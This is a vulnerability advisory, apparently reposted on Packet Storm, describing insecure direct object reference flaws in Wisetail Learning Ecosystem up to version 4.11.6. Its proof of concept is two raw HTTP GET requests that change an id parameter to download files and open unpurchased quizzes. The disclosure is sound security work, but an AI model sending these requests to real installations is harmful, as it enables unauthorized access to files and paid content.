Wisetail Learning Ecosystem (LE) versions up to 4.11.6 suffer from multiple insecure direct object reference vulnerabilities that allow an attacker to download files and get access to the non-purchased course quiz test via a modified id parameter.
cc36e32ff6b7ae17f07bc9e0331c469bc08d5e7f11e8832e9800e8f423a2219cTitle: MULTIPLE IDOR VUNLERABILITies ON WISETAIL LEARNING ECOSYSTEM (LE)
UPTO V4.11.6
*D**ate:* 12/09/2019
*A**uthor:* S. M. Zia Ur Rashid
*Vendor Homepage:* wisetail.com
*Author Contact: *https://www.linkedin.com/in/ziaurrashid/
*Affected Version:* <= 4.11.6
*Assaigned CVE: *CVE-2018-16970, CVE-2018-16971
*Description:* Wisetail Learning Ecosystem (LE) upto v4.11.6 suffers from
multiple insecure direct object reference (IDOR) vulnerability that allows
to download files and access to the non-purchased course quiz test via a
modified id parameter.
*Proof-of-Concep (POC):*
*// File Disclosure*
GET /eco_download.php?id=2639 HTTP/1.1
Host: xxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: xxxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
*// Access Quiz Test*
GET /eco_test.php?id=29 HTTP/1.1
Host: xxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: xxxxxxx
Upgrade-Insecure-Requests: 1
*Video POC:* https://youtu.be/l3msLYdI3fI
*References:*
https://blog.ziaurrashid.com/wisetail-learning-ecosystem-multiple-idor-vunlerability/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16970
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16971
*Regards,*
*S M Zia Ur Rashid*
Student, Dept. of EEE, International Islamic University Chittagong
Student Ambassador, IEEEmadC
Public Relation Ambassador, IEEEXtreme Programming Competition 12.0
Webmaster, IEEE Bangladesh Section Student Activities Committee 2018
Webmaster, IEEE IIUC Student Branch (2018)
Contact: E-mail <smziaurrashid@gmail.com> *|* Web <https://ziaurrashid.com/>
Connect: Facebook <https://www.facebook.com/smziaurrashid.info> *|* LinkedIn
<https://www.linkedin.com/in/ziaurrashid>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed